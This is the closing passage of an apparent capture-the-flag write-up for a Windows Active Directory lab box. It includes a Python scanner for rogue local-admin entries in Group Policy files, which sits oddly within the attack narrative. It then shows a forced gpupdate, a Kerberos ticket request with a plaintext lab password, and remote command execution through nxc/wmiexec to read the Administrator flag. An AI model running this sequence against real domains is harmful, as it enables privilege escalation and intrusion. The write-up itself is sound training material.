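    result: Dict[str, List[str]] = {}
    for key, value in parse_inf(inf_text).get("Group Membership", {}).items():
        match = MEMBERS_KEY.match(key)
        if match:
            members = [m.strip().lstrip("*") for m in value.split(",") if m.strip()]
            result[match.group("group").upper()] = members
    return result


def unexpected_local_admins(inf_text: str, allowed: Set[str]) -> List[str]:
    """SIDs pushed into BUILTIN\\Administrators that are not on the allowlist."""
    members = restricted_group_members(inf_text).get(BUILTIN_ADMINISTRATORS, [])
    return sorted(sid for sid in members if sid.upper() not in allowed)


def scan_sysvol(policies_dir: str, allowed: Set[str]) -> Dict[str, List[str]]:
    """Walk <SYSVOL>\\<domain>\\Policies\\{GUID}\\...\\GptTmpl.inf and report hits per file."""
    findings: Dict[str, List[str]] = {}
    for inf in Path(policies_dir).rglob("GptTmpl.inf"):
        hits = unexpected_local_admins(decode_inf(inf.read_bytes()), allowed)
        if hits:
            findings[str(inf)] = hits
    return findings


if __name__ == "__main__":
    # Assumed allowlist: only this domain's Domain Admins (RID 512) may be added.
    allowed = {"S-1-5-21-2386970044-1145388522-2932701813-512"}
    print(unexpected_local_admins(SAMPLE_GPTTMPL, allowed))
```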

Let’s force a Group Policy update:

PS C:\Users\M.SchoolBus> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

Let’s grab a new TGT for f.frizzle:

impacket-getTGT 'frizz.htb/f.frizzle:Jenni_Luvs_Magic23'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in f.frizzle.ccache

Unfortunately the sshd config denies Administrator remoting; however, we can still run commands:

nxc smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k -x 'type C:\Users\Administrator\Desktop\root.txt' 
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23 (Pwn3d!)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] Executed command via wmiexec
SMB         frizzdc.frizz.htb 445    frizzdc          a15e9d402e...
tags: os/windows - diff/medium